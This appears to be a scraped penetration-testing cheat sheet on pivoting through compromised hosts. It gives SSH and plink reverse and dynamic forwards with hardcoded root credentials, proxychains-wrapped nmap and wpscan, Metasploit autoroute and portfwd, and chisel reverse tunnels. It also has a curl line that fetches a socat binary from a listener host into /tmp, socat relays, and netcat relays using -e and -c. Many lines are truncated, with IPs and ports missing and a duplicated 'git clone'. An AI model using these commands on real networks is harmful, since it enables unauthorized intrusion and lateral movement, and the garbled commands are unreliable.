Skip to content


Single reverse port forwarding

plink.exe -l root -pw password -R 445: <listener_ip>
ssh -l root -pw password -R 445: <listener_ip>

Single Local port forwarding

ssh -l root -pw password -L 445: <target>

Dynamic port forwarding

Socks proxy (socks5)

ssh -l root -pw password -D 1234 <target>

# Reverse dynamic 
ssh -R 1234 <target>

Double SSH tunnel

ssh <1st_target> -L 2222:<2nd_target>:22
ssh localhost -p 2222 -D 1234


# Choose any tools to create a socks proxy 
ssh <target> -D 1234

# Configure proxychains.conf with the protocl and port you chose for the socks proxy
sudo vim /etc/proxychains.conf 
    quiet_mode                 # enable this 
    socks5 1234     # change this

#Use any tool prepending the proxychains command :
proxychains wpscan --url <url> 
wpscan --url <url> --proxy socks5:// --force

# For nmap, you need to specify the -Pn and -sT arguments
proxychains nmap -sT -Pn <target>

You can also forward a single port to avoid using a socks proxy, or use sshuttle


transparent proxy over ssh

# sudo apt-get update && sudo apt-get install sshuttle
sshuttle -r <target_ip>:22 <target_network>/24


#Socks Proxy
run autoroute -s <target_network>/24
use auxiliary/server/socks4a
exploit -j

# Port forward
portfwd add -l 3389 -p 3389 -r <target>
plink.exe -l root -pw password -R 445: <listener_ip> [-P <listener_port>] 


Socks proxy over SSH for Windows

git clone git clone && cd chisel && go build && go build -ldflags="-s -w" && upx build chisel && chmod +x chisel
./chisel client <listener_ip>:10000 R:4506:
chisel server -p 10000 --reverse


curl -sL http://<listener_ip>:1234/socat -o /tmp/socat && chmod +x /tmp/socat && cd /tmp

# remote forward : redirect all trafic coming from TCP 4506 to remote host
socat TCP-LISTEN:4506,reuseaddr,reuseport,fork,bind=<listener_ip> TCP:<remote_ip>:4506

# localhost forward : redirect all trafic coming from TCP 80 to TCP 5000
socat TCP-LISTEN:80,fork TCP:


nc -v -lk -p 8001 -e /usr/bin/nc 8000
nc.traditional -l -p 8001 -c "nc 8000"


Socks proxy over web



. .\Invoke-Portscan.ps1
Invoke-Portscan -Hosts <target>,<target2>